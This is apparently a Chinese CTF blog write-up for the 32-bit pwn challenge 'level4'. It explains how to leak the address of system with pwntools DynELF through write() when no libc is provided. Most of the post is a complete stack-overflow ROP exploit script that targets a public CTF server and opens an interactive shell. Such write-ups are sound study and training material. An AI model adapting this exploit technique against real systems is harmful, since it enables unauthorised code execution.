level4-DynELF之write函数泄露libc

最新推荐文章于 2022-12-20 21:56:54 发布
最新推荐文章于 2022-12-20 21:56:54 发布
阅读量2.8k 收藏
点赞数 1
分类专栏: CTF-PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39268483/article/details/89742057
版权

当题目不提供libc时,可以通过DynELF泄露system的地址

例题level4(32位)

题目逻辑很简单就是通过read函数输入write函数进行输出
read长度限制为0x100,然而需要栈溢出只需要0x8c
查一下保护
在这里插入图片描述
题目就很简单了,直接进行DynELF获取system地址,使用read函数在BSS段输入"/bin/sh\x00"

from pwn import *
p=remote('pwn2.jarvisoj.com',9880)
def leak(addr):
    payload='A'*0x8c
    payload+=p32(0x08048340)#write function
    payload+=p32(0x0804844b)#retn
    payload+=p32(1)
    payload+=p32(addr)
    payload+=p32(4)
    p.send(payload)
    leaked=p.recv(4)
    return leaked
d=DynELF(leak,elf=ELF("./level4"))
system_addr=d.lookup('system','libc')
payload='a'*0x8c
payload+=p32(0x08048310)#read
payload+=p32(0x08048509)#retn balance stack
payload+=p32(0)
payload+=p32(0x0804a024)#readelf -S level4 bss_addr
payload+=p32(8)
payload+=p32(system_addr)
payload+=p32(0xdeadbeef)
payload+=p32(0x0804a024)
p.send(payload)
p.send("/bin/sh\x00")
p.interactive()
playmak3r
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
publicStr的博客
05-16 4581
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
CTF泄漏libc基址的方法
liucc09的博客
01-05 3959
泄漏libc 重点: glibc 的后三位是固定的 main_arena泄漏法 main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim() [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-a8DgTYcd-1609837106507)(D:\04_笔记\images\main_arena.png)] [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接
dltest wp
weixin_44007796的博客
02-17 204
先用file来查看文件类型,发现是32位的文件 然后拉近ida分析 点进vuln函数里面,找到一个read函数 双击buf后发现内存单位只有0x6c+4=112<0x100,说明发生溢出。 再去gdb里面调试一下。 首先,查看保护机制,发现没有保护。 然后计算一下偏移。 由此可得偏移量为112. 我们在文件里面查找system函数发现没有找到,查找‘/bin/sh’也显示没有 说...
(pwn) C语言 write函数且使用write函数泄露 libc版本
半岛铁盒的博客
08-16 3763
ssize_t write(int fd,const void*buf,size_t count); 参数说明: fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数 payload=p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.recvuntil("What is your name?") r.send(payload) ...
通过给的libc泄露函数地址
zszcr的博客
03-22 5471
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露出system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
libc-html_node.tar.gz_GCC 函数_libc
09-21
《GCC 函数_libc深入解析》 在编程领域,C语言是基础且强大的工具,而其背后的库函数更是程序员日常工作中不可或缺的资源。本资料集《libc-html_node.tar.gz》全面聚焦于GCC编译器下的libc库,为开发者提供了一份...
libc-database:建立libc偏移量数据库以简化开发
04-01
libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何...
ret-libc3-write
最新发布
04-01
ret-libc3-write
libc-2.31.so
12-21
用于分析ELF文件格式
libcc-s-seh-1.dll(附安装教程)
08-15
libcc_s_seh-1.dll:解决程序错误的关键组件》 在计算机编程和软件运行过程中,动态链接库(Dynamic Link Library,简称DLL)扮演着至关重要的角色。它们是Windows操作系统中的一种共享代码库,允许多个应用程序...
「内核知识」Linux下的系统调用write
嵌入式Linux内核的博客
12-20 1095
接着,在宏的定义中,先声明了三个函数,分别为__x64_sys_write、_se_sys_write、__do_sys_write,紧接着,定义了__x64_sys_write和_se_sys_write的实现,__x64_sys_write内调用_se_sys_write,_se_sys_write内调用__do_sys_write。由上可以看到,三个方法中,只有__x64_sys_write方法没有static,即只有它是外部可调用的,所以我们看下哪里引用了__x64_sys_write
pwn musl libc环境配置
weixin_46521144的博客
10-21 1097
pwn musl libc环境配置 上网找不到能看的资料,太惨了。还是自己看手册把。 原本是符号调试musl libc时碰到的困难,发现不知道怎么符号调试,后面询问别人看到要用dir命令。然后上网查发现并不能查到讲的清楚的。如果下面有写的有问题的,请大家指出。 gdb dir命令手册 起源 源文件在编译时其实不能携带源代码(好像确实,以前以为-g命令就会带上源代码的)而且源代码可能会移动,因此gdb需要一种方法寻找源代码文件的位置。gdb默认会有一个寻找源文件的列表叫做source path。 source
通过write实现信息泄漏
ChuMeng1999的博客
01-12 533
目录预备知识一、GOT与PLT二、信息泄漏的实现三、libc.so.6文件的作用四、扩展阅读实验目的实验环境实验步骤一漏洞分析实验步骤二通过write实现信息泄漏实验步骤三获取服务器控制权限 预备知识 一、GOT与PLT GOT(Global Offset Table,全局偏移表)是Linux ELF文件中用于定位全局变量和函数的一个表。PLT(Procedure Linkage Table,过程链接表)是Linux ELF文件中用于延迟绑定的表,即函数第一次被调用的时候才进行绑定。 所谓延迟绑定,就是当函
PWN-无libc泄露
zszcr的博客
03-22 3677
pwn题的无libc泄露用到的pwntools的DynELF模块实现条件是:有指向libc空间的 能泄露libc空间信息的函数write和puts函数)能重复触发漏洞DynELF模块的基本框架:p=process('./xxx')def leak(address):    payload='xxx'+address+'xxx'  #address就是你要泄露的地址 ,payload是你控制程序...
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7379
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
泄露libc
inquisiter
01-12 1524
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测出形如"%n"和"%12$p"这种利用方式。 考虑到main函数libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印出l
Linux pwn入门教程(5)——利用漏洞获取libc
子曰小玖的博客
06-04 1901
https://bbs.ichunqiu.com/thread-42933-1-1.html?from=aqzx1 0x00 DynELF简介 在前面几篇文章中,为了降低难度,很多通过调用库函数system的题目我们实际上都故意留了后门或者提供了目标系统的libc版本。我们知道,不同版本的libc函数首地址相对于文件开头的偏移和函数间的偏移不一定一致。所以如果题目不提供libc...
[阅读型]新版musl libc(1.2.2)堆管理之源码剖析!
easy_level1的博客
07-23 2942
目录前言关键的数据结构三级目录 前言 文章更新时间2021.07.09 自defcon21q,那道mooosl起,就有些比赛喜欢折腾这新版的musl libc的堆。在当时打defcon的时候,相关资料几乎没有,只能硬磕源码。虽然笔者当时是审出来了dequeue()会有类似unlink的任意地址写的可能,但是此题还是由大佬亲自出手把它干掉。事后一直懒没有复现,结果强网杯21又蹦出一个musl libc的题,血亏。此文章开坑,也是督促自己把这一块源码仔细扣一扣,做一个笔记。下文除了源码剖析,会以defcon21
如何找到ELF程序对应的libc版本问题
Sakura给爷pwn全场
12-17 898
参考链接: https://qastack.cn/ubuntu/163138/how-do-i-find-what-version-of-libc-my-application-links-to
zhds@zrq-148:~/mariadb10.6$ sudo dpkg --force-depends -r libc6-dev dpkg: libc6-dev:amd64: dependency problems, but removing anyway as you requested: zlib1g-dev:amd64 depends on libc6-dev | libc-dev; however: Package libc6-dev:amd64 is to be removed. Package libc-dev is not installed. Package libc6-dev:amd64 which provides libc-dev is to be removed. libsnmp-dev depends on libc6-dev. zlib1g-dev:amd64 depends on libc6-dev | libc-dev; however: Package libc6-dev:amd64 is to be removed. Package libc-dev is not installed. Package libc6-dev:amd64 which provides libc-dev is to be removed. (Reading database ... 79629 files and directories currently installed.) Removing libc6-dev:amd64 (2.27-3ubuntu1.6) ...
07-22
根据您提供的命令输出,您正在尝试使用 `dpkg` 命令强制删除 `libc6-dev` 软件包。然而,由于存在依赖关系,系统给出了警告并询问您是否继续删除。 在这种情况下,如果您确定要删除 `libc6-dev` 并忽略依赖关系,请...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值